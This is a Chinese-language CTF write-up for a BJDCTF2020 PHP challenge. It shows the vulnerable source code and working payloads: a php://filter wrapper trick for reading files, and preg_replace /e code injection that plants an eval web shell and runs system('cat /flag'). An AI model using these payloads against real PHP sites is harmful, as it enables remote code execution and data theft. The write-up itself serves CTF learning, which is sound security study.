[BJDCTF2020]ZJCTF,不过如此(preg_replace /e 模式下的代码漏洞问题)
题目给了源码:
<?php
error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
echo "
"
.file_get_contents($text,'r')."";
if(preg_match("/flag/",$file)){
die("Not now!");
}
include($file); //next.php
}
else{
highlight_file(__FILE__);
}
?>
不难看出,用data://和php://伪协议即可绕过:
payload:?text=data://text/plain,I%20have%20a%20dream&file=php://filter/convert.base64-encode/resource=next.php
得到:
PD9waHAKJGlkID0gJF9HRVRbJ2lkJ107CiRfU0VTU0lPTlsnaWQnXSA9ICRpZDsKCmZ1bmN0aW9uIGNvbXBsZXgoJHJlLCAkc3RyKSB7CiAgICByZXR1cm4gcHJlZ19yZXBsYWNlKAogICAgICAgICcvKCcgLiAkcmUgLiAnKS9laScsCiAgICAgICAgJ3N0cnRvbG93ZXIoIlxcMSIpJywKICAgICAgICAkc3RyCiAgICApOwp9CgoKZm9yZWFjaCgkX0dFVCBhcyAkcmUgPT4gJHN0cikgewogICAgZWNobyBjb21wbGV4KCRyZSwgJHN0cikuICJcbiI7Cn0KCmZ1bmN0aW9uIGdldEZsYWcoKXsKCUBldmFsKCRfR0VUWydjbWQnXSk7Cn0K
解码:
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {
return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);
}
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}
function getFlag(){
@eval($_GET['cmd']);
一开始不知道 return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);是干什么用的,百度一搜:
http://www.xinyueseo.com/websecurity/158.html
答案就出来了,payload:
?\S*=${eval($_POST[shell])}
![[BJDCTF2020]ZJCTF,不过如此(preg_replace /e 模式下的代码漏洞问题)_第1张图片](http://img.e-com-net.com/image/info8/50627c967e3c4608a7a7117317d786e5.jpg)
或者:
payload2:
?\S*=${getFlag()}&cmd=system(%27cat%20/flag%27);
都可得到flag。